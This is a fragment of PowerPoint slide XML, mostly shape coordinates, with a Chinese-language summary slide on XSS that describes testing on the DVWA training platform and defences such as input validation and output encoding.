                <a:lnTo>
                  <a:pt x="758632" y="59578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="762000" y="42925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="758632" y="26199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="749442" y="12557"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="735800" y="3367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719074"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57" name="TextBox 57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5124195" y="1904999"/>
            <a:ext cx="1943608" cy="575310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="13335" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <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rPr>
              <a:t>PART06</a:t>
            </a:r>
            <a:endPar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58" name="AutoShape 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9001125" y="257175"/>
            <a:ext cx="2905125" cy="42862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TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="727547" y="1347605"/>
            <a:ext cx="6410325" cy="704850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="123825" tIns="123825" rIns="57150" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="174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XSS跨站脚本攻击防护</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6" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="727547" y="1994199"/>
            <a:ext cx="6410325" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="123825" tIns="123825" rIns="57150" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1425">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:alpha val="100000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>项目介绍了XSS的基本概念，包括XSS的分类以及各个类型XSS的工作原理，还介绍了基于DVWA平台实现不同类型XSS初级、中级和高级等三个级别渗透测试的方法。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1425">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7" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="656837" y="3761555"/>
            <a:ext cx="6210300" cy="704850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="123825" tIns="123825" rIns="57150" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="174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XSS攻击防护策略</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8" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="656837" y="4425262"/>
            <a:ext cx="6486525" cy="800100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="123825" tIns="123825" rIns="57150" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1425">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:alpha val="100000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>项目总结了XSS攻击的基本防护方法，包括输入验证、输出编码、使用安全框架和库、定期安全审计等，以有效减少XSS攻击的风险，提升应用的安全性。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1425">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pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix amt="70000"/>
          </a:blip>
          <a:srcRect l="13920" r="13920"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7432633" y="1237527"/>
            <a:ext cx="3505032" cy="4673376"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 10"/>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项目小结</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0" y="0"/>
            <a:ext cx="1400175" cy="2562225"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1400175" h="2562225">
                <a:moveTo>
                  <a:pt x="1400174" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2478790"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75181" y="2508277"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="119281" y="2522275"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164238" y="2534263"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="210000" y="2544190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="256515" y="2552001"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="303730" y="2557646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351592" y="2561071"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="400049" y="2562225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="448506" y="2561071"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="496367" y="2557646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="543581" y="2552001"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="590095" y="2544190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="635857" y="2534263"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="680813" y="2522275"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="724913" y="2508277"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="768103" y="2492321"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="810332" y="2474460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="851546" y="2454747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="891693" y="2433233"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="930721" y="2409972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="968578" y="2385016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1005211" y="2358416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1040568" y="2330226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1074596" y="2300497"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1107243" y="2269283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1138456" y="2236636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1168184" y="2202607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1196373" y="2167250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1222972" y="2130617"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1247928" y="2092760"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1271189" y="2053732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1292701" y="2013585"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1312414" y="1972371"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1330274" y="1930143"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1346229" y="1886953"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1360227" y="1842854"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1372215" y="1797898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1382140" y="1752138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1389952" y="1705626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1395596" y="1658413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1399021" y="1610554"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1400174" y="1562100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1400174" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="80A2CA">
              <a:alpha val="100000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Freeform 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="2881630" cy="700405"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2881630" h="700405">
                <a:moveTo>
                  <a:pt x="2872829" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2874241" y="7255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2879569" y="53172"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2881375" y="100075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2879569" y="146962"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2874241" y="192863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2865523" y="237645"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2853549" y="281175"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2838453" y="323319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2820368" y="363943"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2799427" y="402914"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2775765" y="440098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2749514" y="475363"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2720808" y="508573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2689780" y="539596"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2656564" y="568299"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2621293" y="594547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2584101" y="618207"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2545122" y="639146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2504487" y="657230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2462333" y="672325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2418790" y="684298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2373994" y="693016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2328077" y="698345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2281173" y="700151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="700151"/>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 name="Freeform 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="3129280" cy="890905"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3129280" h="890905">
                <a:moveTo>
                  <a:pt x="3122626" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3123307" y="4517"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3127582" y="51915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3129025" y="100075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3127582" y="148235"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3123307" y="195632"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3116284" y="242183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3106595" y="287806"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3094323" y="332417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3079551" y="375934"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3062361" y="418275"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3042837" y="459356"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3021061" y="499095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2997116" y="537410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2971085" y="574217"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2943051" y="609434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2913097" y="642979"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2881304" y="674768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2847757" y="704718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2812537" y="732748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2775729" y="758775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2737414" y="782715"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2697675" y="804486"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2656595" y="824005"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2614258" y="841191"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2570745" y="855959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2526139" y="868227"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2480525" y="877913"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2433983" y="884934"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2386597" y="889208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2338450" y="890651"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="89055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5" name="Freeform 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="3386454" cy="1081405"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3386454" h="1081405">
                <a:moveTo>
                  <a:pt x="3381054" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3381709" y="5472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3385069" y="52419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3386200" y="99949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3385069" y="147489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3381709" y="194446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3376171" y="240767"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3368508" y="286401"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3358771" y="331298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3347010" y="375404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3333278" y="418670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3317626" y="461043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3300105" y="502473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3280766" y="542907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3259662" y="582295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3236843" y="620585"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3212361" y="657725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3186268" y="693665"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3158614" y="728352"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3129451" y="761736"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3098831" y="793765"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3066805" y="824388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3033424" y="853553"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2998740" y="881209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2962805" y="907304"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2925669" y="931788"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2887384" y="954608"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2848002" y="975713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2807573" y="995052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2766150" y="1012574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2723783" y="1028227"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2680525" y="1041960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2636426" y="1053720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2591538" y="1063458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2545913" y="1071121"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2499601" y="1076659"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2452655" y="1080019"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2405125" y="1081151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1081151"/>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6" name="Freeform 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="3634104" cy="1281430"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3634104" h="1281430">
                <a:moveTo>
                  <a:pt x="3629109" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3629951" y="8288"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3632869" y="56282"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3633850" y="104775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3632869" y="153267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3629951" y="201261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3625133" y="248717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3618454" y="295599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3609951" y="341867"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3599662" y="387485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3587626" y="432414"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3573879" y="476617"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3558460" y="520056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3541406" y="562693"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3522756" y="604490"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3502547" y="645409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3480817" y="685413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3457604" y="724463"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3432946" y="762522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3406880" y="799552"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3379445" y="835515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3350677" y="870373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3320616" y="904089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289299" y="936625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3256764" y="967942"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3223048" y="998003"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3188190" y="1026770"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3152227" y="1054205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3115197" y="1080271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3077138" y="1104929"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3038087" y="1128142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2998084" y="1149872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2957165" y="1170081"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2915368" y="1188731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2872731" y="1205785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2829292" y="1221204"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2785089" y="1234951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2740160" y="1246988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2694542" y="1257276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2648273" y="1265779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2601392" y="1272458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2553936" y="1277276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2505942" y="1280194"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2457449" y="1281176"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1281176"/>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7" name="Freeform 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="3891279" cy="1471930"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3891279" h="1471930">
                <a:moveTo>
                  <a:pt x="3886941" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3887737" y="9218"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3890199" y="56789"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3891025" y="104775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3890199" y="152760"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3887737" y="200331"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3883667" y="247459"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3878016" y="294118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3870811" y="340280"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3862079" y="385919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3851848" y="431007"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3840144" y="475517"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3826995" y="519423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3812428" y="562696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3796469" y="605310"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3779146" y="647237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3760486" y="688451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3740516" y="728925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3719264" y="768631"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3696756" y="807542"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3673019" y="845632"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3648081" y="882872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3621969" y="919237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3594709" y="954698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3566329" y="989229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3536857" y="1022802"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3506318" y="1055391"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3474741" y="1086968"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3442152" y="1117507"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3408579" y="1146980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3374048" y="1175359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3338587" y="1202619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3302222" y="1228731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3264982" y="1253669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3226892" y="1277406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3187981" y="1299914"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3148275" y="1321167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3107801" y="1341136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3066587" y="1359796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3024659" y="1377119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2982046" y="1393078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2938772" y="1407645"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2894867" y="1420795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2850357" y="1432498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2805269" y="1442730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2759630" y="1451461"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2713468" y="1458666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2666809" y="1464317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2619681" y="1468387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2572110" y="1470849"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2524124" y="1471676"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1471676"/>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8" name="AutoShape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647700" y="19050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9" name="AutoShape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="19050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0" name="Freeform 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="819150" y="190500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1" name="AutoShape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
